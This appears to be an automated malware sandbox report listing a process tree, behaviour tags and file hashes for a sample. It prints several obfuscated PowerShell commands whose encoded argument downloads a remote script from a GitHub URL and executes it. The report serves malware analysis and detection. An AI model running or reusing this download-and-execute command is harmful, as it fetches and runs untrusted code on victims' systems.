C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:2416
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3744
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
57c548b15fb26ecf9053a5adc58db9f2
SHA1c9f15dbef109de66634ddd66d205aa8a13d90428
SHA25684a3d6308c04697e1b736ba62d3f9cc8b94c0183714f67cf027c6681dfad47bb
SHA512eb99e2574128f8f6c1e6cafff310c379c8e0a8968293038bebe68ec1864b83f01bc9b72314699ea9ecf49054103ca05d6de80201519047424a1f0b865365f10a
-
MD5
22739b4511ffda27ba5a43947b21a609
SHA1079c2f0c6dfe5fc173f40811ff23d99be467c3f0
SHA2562862f6c21367deba0f2be76bb46b4271ad1f44a843876b27738893ce58961cf2
SHA5123918293d55cc260288394312615cbbbba028c8d2a3706e243d4a3f46dbcad27b2f6629a7ca34b161cec86d4fa55c240d87c0ce5db3f63043099265fffda5b42f
-
MD5
c443cf6ae10a8a6234844083270313d0
SHA1f75c49b5b213ad54b21b5e135c8a39996f1d6dfc
SHA256328ad5a5c3548402b693a69d731c8976538efef069f128083055f999c9ee4715
SHA5129e75ee1438933cd4cfd0633c81d3c5983b426a32666172c7b13a8f8c598acf2e941a015271c3fbbb2bc4c83ac3c0aae92a7fe6e6ab9283efb4b1c588c79b5b07
-
MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
MD5
67dd3480acda1eb6e0cfbb4fdd7d3ff5
SHA1c470116790dca927c7e00b6de597922758a7e184
SHA2561ec5fe169e1239359c2bdc08af5913e966c79d31b112d09f97f971a285807742
SHA512ab0b6faf3e1875d86fdd321141ad5b45d494de60feec645b2fcc43f13c602feae799adcd43148d389a4f514dfa98a7b11f62c2e9c6a9e1b46c25e49b0f9d1aa5
-
MD5
fdff1f264c5f5570a5393659b154cb88
SHA1de254de5e517074a9986b36fec83f921aa9aa497
SHA256ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
SHA512db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
-
MD5
b301617e9f67c3eda9b02cce3343b08b
SHA1b0207afa7574097b479bf464df834559a53c703b
SHA256f2fb172042c62da704b1afe0bc8e1462ca2d9ba990b17232eebaa4d03d200ef0
SHA5120d1c35908d7e35d29acd43b2a2efba007941c8126ffd085abbd20f321bf75d98b8d83677c7ade5b3589125786b6f1a5afbd3e0dde392a9062c3a108df4b36451
-
MD5
ddc17bc082038ee52b30808daf87f090
SHA1f862491e1195e039e05bd241856a9015846b3096
SHA256a04583453340fa979e7efae6022c531ef06e175c388a15214bd6d32a67f1e627
SHA5126f5edb94f56ec7e70199bfce671f20b111b102a017ba48ff7b391b09bb7485d3a7be9c2bdc2fa587b463a2874c795992db4a5dd824a4d7a4c0fdeb41ff3a9370
-
MD5
072548125d601f1048b4cb73682cbb7b
SHA15d3582747ad69cff9db5aa45b20816a7c2218cf0
SHA256e4453d95ba2fa4de68fa324a1dc8e59028969d86ea5b5a8b08a1bc33bce40582
SHA512b54f5fcf9d153a61c82dc698d7dc7314720fda304e013ad8dc04fc277e6ff905a049f945f2adcc61df7b4853d38d92da026b7836f6aa52a331a4cba9a56184fb